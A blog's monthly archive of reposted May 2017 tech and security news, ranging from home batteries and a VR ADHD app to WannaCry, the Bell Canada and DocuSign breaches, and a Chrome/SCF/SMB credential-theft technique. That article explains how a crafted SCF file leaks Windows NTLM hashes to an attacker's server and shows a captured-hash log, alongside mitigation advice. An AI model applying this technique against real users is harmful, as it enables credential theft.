Monthly Archives: May 2017

Watts is a huge battery that powers your home

Like Tesla’s Powerwall, Watts is a big battery that can power your home. One Watts cell can support a few small appliances including computers and refrigerators and a few units can power TVs and electric washers. The units can charge via the grid or with solar panels and the Watts units include an app that shows discharge and battery remaining.

The batteries, which were designed in Russia, are stackable which means you can add as many or as few devices to your power network. They can also send energy back onto the grid as necessary. It offers 1.5 kW with a 3kW peak and a capacity of 1.2 kWh.

The company is shipping batteries in August and one unit costs $2,999. They aim to be the LEGO of high-end home batteries, allowing you to add some real power storage to your home, office, or Zombie-proof bunker.


via:  techcrunch

reVIVE is a VR solution for diagnosing ADHD built by high school students

The first team to go onstage at the Disrupt NY 2017 Hackathon showed off reVIVE, a virtual reality solution for diagnosing ADHD. The team of three high school juniors wanted to create a solution that would simplify the lengthy and expensive process of diagnosing the illness.

The team tells me that ADHD normally takes six to nine months to diagnose, and that process alone can cost patients thousands of dollars.

The reVIVE tool is composed of three different tests that gauge the user’s motor skills, sustained concentration and reaction time. Users are asked to perform tasks like navigating a maze, touching colored objects as they light up certain colors and standing still within a defined space. The team created a scoring system to measure a user’s performance that will allow medical professionals to gain a clearer picture of their situation within minutes.

Check out this video:

Akshaya Dinesh, 17; Sowmya Patapati, 16; and Amulya Balakrishnan, 17, built the virtual reality app for the HTC Vive using Unity. The team of New Jersey high school students met and became friends at the hackathon. Balakrishnan and Patapati work with the organization #BUILTBYGIRLS.

“We really wanted to quantify ADHD diagnoses,” said Dinesh “When you’re immersed in a 360 environment, patients experience the environment as if they’re really there.”

The team isn’t trying to replace the role of therapists when it comes to treatment, but they believe that the app can serve as a telemedicine tool, alerting a user’s therapist to their latest performance inside the app, while analyzing the data over time thanks to IBM Watson.

Medical diagnosing and treatment have already proven to be a major use case for virtual reality. Companies like MindMaze have already achieved unicorn status catering their VR solutions directly to medical professionals. The team believes that diagnosing illnesses is one of “the best use cases possible for VR.”


via: techcrunch

Test-approved app could kill off the graphing calculator

Students can kiss $150 calculators goodbye.

Math students have a love-hate relationship with the funky, expensive TI-84 graphing calculators, but thanks to a new deal, they’ll soon get a free option. Starting this spring, pupils in 14 US states will be able to use the TI-like Desmos online calculator during standardized testing run by the Smarter Balanced consortium. “We think students shouldn’t have to buy this old, underpowered device anymore,” Desmos CEO Eli Luberoff told Quartz.

The Desmos calculator will be embedded directly into the assessments, meaning students will have access during tests with no need for an external device. It’ll also be available to students in grades 6 through 8 and high school throughout the year. The calculator is free to use, and the company makes money by charging organizations to use it, according to Bloomberg.

The Desmos calculator is more advanced than the TI-84 or other devices, offering a friendlier interface, live graphing updates, and free access via a smartphone, tablet or any other connected device. Thanks to an earlier deal with Smarter Balanced, it also provides accessibility features for the blind and visually impaired. It’s used by students in 146 countries and racks up over 300,000 hours of use per month, the company says.

A Texas Instruments TI-84 calculator hangs on a display rack

Not cheap: the TI-84 graphing calculator (Getty Images)

TI has monopolized the graphing calculator market for years, but Desmos has made rapid inroads since it launched its calculator app in 2011. It’s backed by the world’s largest education company, Pearson PLC, which uses it for its enVision high-school math program. It’s also supported by SAT exam administrator The College Board, which endorses it for drills, practice exams and curriculum assessments.

There are lots of online graphing calculators available, but educators are reluctant to allow them during tests. “Our products include only the features that students need in the classroom, without the many distractions or test security concerns that come with smartphones, tablets and internet access,” Texas Instruments’ Peter Balyta told Bloomberg.

However, the Desmos and Smarter Balanced consortium’s deal negates that concern by embedding the calculator directly into the test, cutting off any outside access. That means students can use the calculator app while studying and have access to the same tech during tests, without needing to spend a bundle on a TI-84 or other calculator. The need for pricey calculators is “a huge source of inequity, and it’s just not the best way to learn,” says Luberoff.


via:  engadget

Nintendo is planning a Legend of Zelda mobile game

Following up on the massive success of Pokémon GO and the, well, slightly less massive success of Super Mario Run, Nintendo is reportedly planning a Legend of Zelda for smartphones for release later this year, or so The Wall St Journal’s sources have it.

Details beyond that are scarce; it would supposedly follow the release of the also-rumored Animal Crossing mobile game, presumably once everyone has played that into the ground.

How exactly they expect to represent the expansive exploring, puzzling and battling that have defined the series heretofore is unclear. Super Mario Run took a minimalist approach to controls, essentially reducing the platformer to a one-button game.

That would be rather difficult with the vastly more complex Zelda series — doubly so considering the improbably well-received Breath of the Wild was so vast and unrestricted. Whether the company would repeat its pricing strategy for Mario is also unknown; sales weren’t quite what it had hoped.

We’ll likely know more soon; Super Mario Run was announced three months ahead of its release. But if the timing hinted at by the WSJ’s sources is correct, we’ll hear about the Animal Crossing game first, though who knows when.


via:  techcrunch

Beware! Hackers Can Steal Your Windows Password Remotely Using Chrome

A security researcher has discovered a serious vulnerability in the default configuration of the latest version of Google’s Chrome running on any version of Microsoft’s Windows operating system, including Windows 10, that could allow remote hackers to steal user’s login credentials.

Researcher Bosko Stankovic of
DefenseCode has found that just by visiting a website containing a malicious SCF file could allow victims to unknowingly share their computer’s login credentials with hackers via Chrome and the SMB protocol.

This technique is not new and was exploited by the Stuxnet — a powerful malware that specially designed to destroy Iran’s nuclear program — that used the Windows shortcut LNK files to compromise systems.

What’s make this attack different from others is the fact that such SMB authentication related attacks have been first time demonstrated on Google Chrome publicly, after Internet Explorer (IE) and Edge.

Chrome + SCF + SMB = Stealing Windows Credentials

SCF (Shell Command File) shortcut file format works similar as LNK files and is designed to support a limited set of Windows Explorer commands that help define an icon on your desktop, such as My Computer and Recycle Bin.

“Currently, the attacker just needs to entice the victim (using fully updated Google Chrome and Windows) to visit his website to be able to proceed and reuse victim’s authentication credentials,” Stankovic wrote in a blog post, describing the flaw.

Basically, shortcut links on your desktop are a text file with a specific syntax of shell code that defines the location of icon/thumbnail, application’s name and it’s location.


Since Chrome trusts Windows SCF files, attackers can trick victims into visiting their website containing a maliciously crafted shortcut file, which gets downloaded automatically onto the target systems without prompting confirmation from the users.

As soon as the user opens the folder containing that downloaded file, immediately or later, this file automatically runs to retrieve an icon without the user having to click on it.

But instead of setting the location of an icon image, the malicious SCF file created by the attacker contain the location of a remote SMB server (controlled by the attacker).


So, as soon as the SCF file attempts to retrieve the icon image, it will trick into making an automatic authentication with the attacker’s controlled remote server over SMB protocol, handing over the victim’s username and hashed version of password, allowing the attacker to use your credentials to authenticate to your personal computer or network resource.
“Setting an icon location to a remote SMB server is a known attack vector that abuses the Windows automatic authentication feature when accessing services like remote file shares,” Stankovic said.

But following the Stuxnet attacks, Microsoft forced LNK files to load their icons only from local resources so they’d no longer be vulnerable to such attacks which make them load malicious code from outside servers.

However, SCF files were left alone.


Exploiting LM/NTLM Hash Authentication via SCF File

Exploiting LM/NTLM Hash Authentication

Image Source: SANS

But why would your Windows PC automatically hand over your credentials to the server?
If you are unaware, this is how authentication via the Server Message Block (SMB) protocol works in combination with the NTLM challenge/response authentication mechanism.
In short, LM/NTLM authentication works in 4 steps:

  • Windows users (client) attempts to log into a server.
  • The server responds with a challenge value, asking the user to encrypt the challenge value with his hash password and send it back.
  • Windows handles the SCF request by sending the client’s username and hashed version of the password to the server.
  • The server then captures that response and approves authentication, if the client’s hash password is correct.

Now, in the SCF attack scenario, elaborated by Stankovic, Windows will attempt to authenticate to the malicious SMB server automatically by providing the victim’s username and NTLMv2 password hashes (a personal computer or network resource) to the server, as described in above-mentioned step 3.
If the user is part of a corporate network, the network credentials assigned to the user by his company’s sysadmin will be sent to the attacker.

If the victim is a home user, the victim’s Windows username and password will be sent to the attacker.


[*] SMB Captured – 2017-05-15 13:10:44 +0200
NTLMv2 Response Captured from –
USER:Bosko DOMAIN:Master OS: LM:


No doubt, the credentials are encrypted but can be “brute-forced” later to retrieve original login password in plain text.

“It is worth mentioning that SCF files will appear extensionless in Windows Explorer regardless of file and folder settings,” the researcher said. “Therefore, file named picture.jpg.scf will appear in Windows Explorer as picture.jpg. This adds to inconspicuous nature of attacks using SCF files.”

No Need to Decrypt Password *Sometimes*

Since a number of Microsoft services accept the password in its hashed form, the attacker can even use the encrypted password to login to your OneDrive,, Office 365, Office Online, Skype, Xbox Live and other Microsoft services, making the decryption unnecessary.

Such vulnerabilities, according to the researcher, could also pose a serious threat to large organizations as they enable attackers to impersonate one of their members, allowing attackers to immediately reuse gained privileges to further escalate access and gain access and control of their IT resources and perform attacks on other members.

How to Prevent Such SMB Authentication-related Attacks

Simply, block outbound SMB connections (TCP ports 139 and 445) from the local network to the WAN via firewalls, so that local computers can not query remote SMB servers.
Stankovic also advises users to consider disabling automatic downloads in Google Chrome by going to Settings → Show advanced settings → and then Check the “Ask where to save each file before downloading” option.
This change will allow you to manually approve each download attempt, which would significantly decrease the risk of credential theft attacks using SCF files.
Google is aware of the vulnerability and is said to be working on a patch, but no timeframe has been given as to when the patch will be made available to the users.


via:  thehackernews

Bell Canada Hacked: Data of 1.9 Million Customers Stolen

While we all were busy in the WannaCry ransomware menace, two separate data breaches have been reported, one in DocuSign, a major provider of electronic signature technology, and another in BELL, Canada’s largest telecommunications company.

Canadian mobile phone, TV, and internet service provider Bell on Monday confirmed that the company had been hit by an unknown hacker who has managed to access its customer information illegally.

In a brief statement released by Bell Canada, the company said an unknown hacker managed to have his hands on data of millions of Bell customers.

However, the company did not mention the compromised customer details stolen in the hack were pulled from which particular service.

The company said email addresses, names and telephone numbers of its customers had been accessed in the breach.

How many victims Affected?

Bell confirmed the hack and said the unknown hacker has managed to gain access to information on nearly 2 million customers.

“The illegally accessed information contains approximately 1.9 million active email addresses and approximately 1,700 names and active phone numbers,” the company said.

However, Bell assured its customers that there’s no indication of hacker’s access to “financial, password or other sensitive personal information,” and that the incident is not linked to the global WannaCry ransomware attacks.

What’s the Missing Link?

The incident seems to be an extortion attempt by a hacker or group of hackers who posted some of the stolen data of Bell Canada customers online and threatened to leak more data if the company fails to cooperate.

“We are releasing a significant portion of’s data due to the fact that they have failed to [co-operate] with us,” reads a post on PasteBin published Monday afternoon, several hours before Bell Canada released its apology.

“This shows how Bell doesn’t care for its [customers’] safety and they could have avoided this public announcement… Bell, if you don’t [co-operate], more will leak :).”

There is still no explanation for who is behind the extortion demand or what sort of cooperation the hackers were seeking for, but it appears Bell Canada refused to pay the ransom demand.

However, this information remains unconfirmed.

What is Bell Canada doing? The Canada’s largest telecommunication said the company is working with the Canadian law enforcement authorities to figure out who was responsible for the attack.

“We apologize to Bell customers for this situation and are contacting those affected directly,” the company said.

“Bell took immediate steps to secure affected systems. The company has been working closely with the RCMP cyber crime unit in its investigation and has informed the Office of the Privacy Commissioner.”

What should Bell Canada customers do?

While Bell Canada believes there is “minimal risk involved for those affected” by the attack, having access to customer information, including email addresses, names and/or telephone numbers, opens the opportunity for targeted phishing attacks to customers.

So, users should particularly be alert of any phishing email, which are usually the next step of cyber criminals after a breach to trick users into giving up further details like financial information.

For the obvious reasons, all Bell Canada customers are highly recommended to change their passwords as soon as possible.


via:  thehackernews

Over 200 Brooks Brothers Stores Hit by Payment Card Breach

U.S. clothing retailer Brooks Brothers, which operates more than 400 stores worldwide, informed customers last week that cybercriminals had access to its payment processing systems for nearly one year.

According to the company, attackers installed malware designed to capture payment card data at many of its retail and outlet locations. While the organization does not store card data, the malware intercepted information as it passed through its systems.

Customers who made purchases at certain Brooks Brothers locations in the U.S. and Puerto Rico between April 4, 2016, and March 1, 2017, may have had their payment card information stolen. The exposed information includes names, credit and debit card numbers, card expiration dates, and verification codes. However, not all transactions were affected.

The retailer pointed out that social security numbers or other personally identifiable information was not compromised in the breach. It also noted that online transactions were not at risk, and Brooks Brothers airport locations were not impacted.

Brooks Brothers has set up a web page that lists all the impacted locations in each state. More than 220 stores are listed, with a majority in California, Florida, Massachusetts, New Jersey, New York, North Carolina, Pennsylvania and Texas.

The company is confident that the malware has been removed from its systems. Law enforcement has been alerted and experts have been called in to investigate the incident and assist with remediation efforts.

Brooks Brothers has provided some advice on what potentially affected customers can do to protect themselves against payment card fraud, but pointed out that it cannot be certain whether any particular individual is affected, which is why it will not call or email anyone regarding the breach. It’s not uncommon for scammers to take advantage of such incidents to trick people into handing over personal and financial information.

Customers who have concerns or questions can call 888-735-5927 between 9:00 AM and 9:00 PM ET, Monday through Friday.

Brooks Brothers is not the only major clothing retailer to suffer a data breach recently. Last year, Eddie Bauer informed customers that its payment processing systems had been infected with malware for more than six months.


via:  securityweek

NSA tools behind worldwide WanaCryptOr ransomware attack

A ransomware attack leveraging alleged NSA hacking tools that began hitting the U.K. National Health System earlier today, has spread globally, impacting FedEx and Spanish telecom Telefonica, and locking up tens of thousands of computers in 74 countries.

Early analysis has found that the attackers dropped WanaCryptOr 2.0 ransomware using an exploit tool released last month by the Shadow Brokers hacking group. The ransomware, also known as Wannacry, the displays a ransom note demanding $300 in Bitcoin that must be paid within three days. The most widely hit countries so far are the Russian Federation, Ukraine, India and Taiwan, according to Kaspersky Labs. About 60,000 computers in total are infected.

The attacker has not yet been named, however, a 22-year-old independent cybersecurity researcher who tweets at @MalwareTechBlog and blogs at MalwareTech is being credited with helping mitigate the attack on Friday. He discovered the malware once injected into a target computer attempted to contact a command and control website, reported the Telegraph. If the target computer was unable to make a connection to that website the ransomware then activated taking the computer hostage. However, if the target computer was able to successfully contact the remote website it simply terminated itself and did not install the ransomware.

The researcher was able to use this to his advantage. The remote website was for sale, so he bought it for a small sum, once it showed up as officially purchased it began connecting to all the infected computers effectively turning off the attack.

“A few seconds after the domain had gone live I received a DM from a Talos analyst asking for the sample I had which was scanning SMB host, which i provided. Humorously at this point we had unknowingly killed the malware so there was much confusion as to why he could not run the exact same sample I just ran and get any results at all,” he wrote.

However, before the researcher was able to enact his plan the ransomware had spread globally.

“The ransomware is spread using a known, and patched, vulnerability (MS17-010) that came from a leaked NSA set of exploits that we reported on our blog in April. Our research shows the encryption is done with RSA-2048 encryption. That means that decryption will be next to impossible, unless the coders have made a mistake that we haven’t found yet,” wrote Malwarebytes researcher Pieter Arntz.

Courtesy of Malwarebytes

The vulnerability MS17-010 is also known as ETERNALBLUE, which was patched by Microsoft in March, and is used to inject the backdoor malware DoublePulsar, according to Cyberscoop. The malicious actors then use the backdoor to infect the target machine with WanaCryptOr.

The initial entry into a company is most like through a phishing attack.

“It would be shocking if the NSA knew about this vulnerability, but failed to disclose it to Microsoft until after it was stolen. It is past time for Congress to enhance cybersecurity by passing a law that requires the government to disclose vulnerabilities to companies in a timely manner. Patching security holes immediately, not stockpiling them, is the best way to make everyone’s digital life safer,” said Patrick Toomey, a staff attorney with the American Civil Liberties Union’s National Security Project.

“The speed with which it’s spreading is frightening. Ransomware becomes a significant nuisance if full backups of the systems weren’t taken, dramatically increasing the recovery time if the ransom isn’t paid,” said Gavin Millard, Tenable EMEA technical director.

The scattershot nature of the attack has also raised eyebrows with it hitting a variety of industries and countries.

“This kind of attack is indiscriminate in its nature, it will attack any machine that is not patched for the particular vulnerability, in this case MS17-010, that it is exploiting. This appears to be financially motivated, however that doesn’t mean that there aren’t other potential scenarios,” Owen Connelly, VP services at IOActive, told SC Media.

Phil Richards, CISO with Ivanti, called the persistent nature of this attack strong, with infected systems – at least those that do not pay the ransom – having to be powered down and rebuilt from scratch. Also, all backups have to be pulled off the network so they do not become ensnared.

“It isn¹t surprising that NHS haven¹t gotten to root cause yet. Since 90% of this type of ransomware comes in through phishing, my assumption went with the numbers. This ransomware enumerates accounts and systems when it infects a machine, so spreading to servers is also expected. Servers are more consistently available on the network than workstations. So far, this appears to be a Windows only ransomware, not affecting Linux or Mac.

Because the attack is taking advantage of an already patched vulnerability some experts are calling it a failure on behalf of the victims to have left their systems unpatched.

“This is an example of the systemic failure of government and commercial firms to implement security, resiliency and appropriate privacy policies,” said Philip Lieberman, president of Lieberman software.

John Bambenek, threat research manager at Fidelis Cybersecurity, said that the WannaCry attack demonstrates the serious consequences that can occur when a nation-state’s zero-day exploit is leaked into the wild, even after a patch is developed. “This is the first time that a worm-link tool has been used in conjunction with ransomware that has created devastating impact against entire organizations,” said Bambenek. “Strong and swift patching would have helped mitigate this threat. It has undoubtedly captured the imagination of criminals who don’t want to hold individual machines ransom but to take entire organizations hostage and surely we will see much more of this in the coming weeks.”


via:  scmagazine

DocuSign confirms customer emails were stolen and used in phishing campaign

DocuSign, the owner of eSignature, one of the most popular digital signature services, said today that a database of customer emails was breached and used in a phishing campaign that began last week.

The phishing emails were designed to look like they were sent by DocuSign and had subject lines that said “Completed: [domain name] – Wire transfer for recipient-name Document Ready for Signature” or “Completed [domain name/email address] – Accounting Invoice [Number] Document Ready for Signature.” Word Document attachments in the emails installed malware if opened.

The company began tracking the phishing campaign on its security site on May 9, though it was not until today that it confirmed its email list had been stolen.

In today’s post, DocuSign said its eSignature service, envelopes and customer documents remain secure, but that hackers were able to access customer emails through a “non-core” system that the company uses to send service-related announcements. DocuSign added that only emails were stolen and other sensitive information, including names, physical addresses, passwords, social security numbers, credit card data and documents sent through the eSignature system, were not accessed.

DocuSign said it has put more security measures in place and contacted law enforcement agencies. It listed several steps customers should take to protect themselves, including forwarding suspicious emails to before deleting them from their computers, updating anti-virus software and reading DocuSign’s white paper on phishing.


via:  techcrunch

Signs That You’re About to Suffer a Security Breach

Do you ever get those thoughts in the back of your mind that somehow, at some point, your organization is going to experience a security breach? I know that’s the kind of stuff that tends to keep chief information security officers (CISOs) and other security leaders up at night. The thing is, much of these thoughts are just that — thoughts.

Thoughts, in and of themselves, really mean nothing when it comes to security incidents and breaches. After all, how could something that’s intangible and often rooted in stress manifest as a tangible outcome that puts you in the headlines and leads to that dreaded toxic CV?

Go With Your Gut

I think we’ve all had those feelings deep down in the pits of our stomachs that something’s going on and weird things are about to happen. But none of these thoughts really matter at the end of the day when you have gaping holes in your information security program.

Looking at things from a broader perspective, here are some common mistakes I have observed in my work performing security assessments and consulting that can directly impact your organization’s security posture.

Your business may be at risk of a security breach if:

  • You have failed to get all the right people in executive management, legal, HR and other departments on board with your security initiatives.
  • You don’t fully understand your true risk posture. Maybe you are performing ongoing risk assessments, but you’re not looking at all the areas that matter. Perhaps you’re not using the right tools, or maybe you’re taking the wrong approaches. Whatever it is, you still haven’t uncovered the risks lurking in your environment.
  • You have well-documented policies with no true substance backing them up in terms of technical controls and business processes.
  • You have failed to connect with your user base in terms of security. Your culture remains one of IT against everyone else, or IT is placed on the back burner until an incident occurs.
  • You lack an incident response plan that includes investigative and recovery procedures as well as contact information for outside parties that you’ll need to call for assistance.
  • You’re not invited to legal, audit or enterprise risk meetings that involve the security initiatives you’re managing.

You know the saying: When the going gets tough, the tough get going. Is your security program going to hold up to that? Can you rely on your people, technologies and processes to absorb whatever negative impacts come your way?

How to Stop a Security Breach in Its Tracks

I think most people believe their information security programs are better than they really are — it’s human nature. It’s up to you, as the information security leader, to play devil’s advocate. Don’t be ashamed to ask tough questions or reveal the ugly parts of your program. After all, acknowledgment and diagnosis account for more than half of what it takes to build a strong information security program.

Right now, odds are probably not in your favor to detect and prevent security breaches. Make the decision to change that. Things are only going to become more complicated in your organization. Security holes that are plugged and processes that are built out starting today will serve to bolster your security program for years to come.


via:   securityintelligence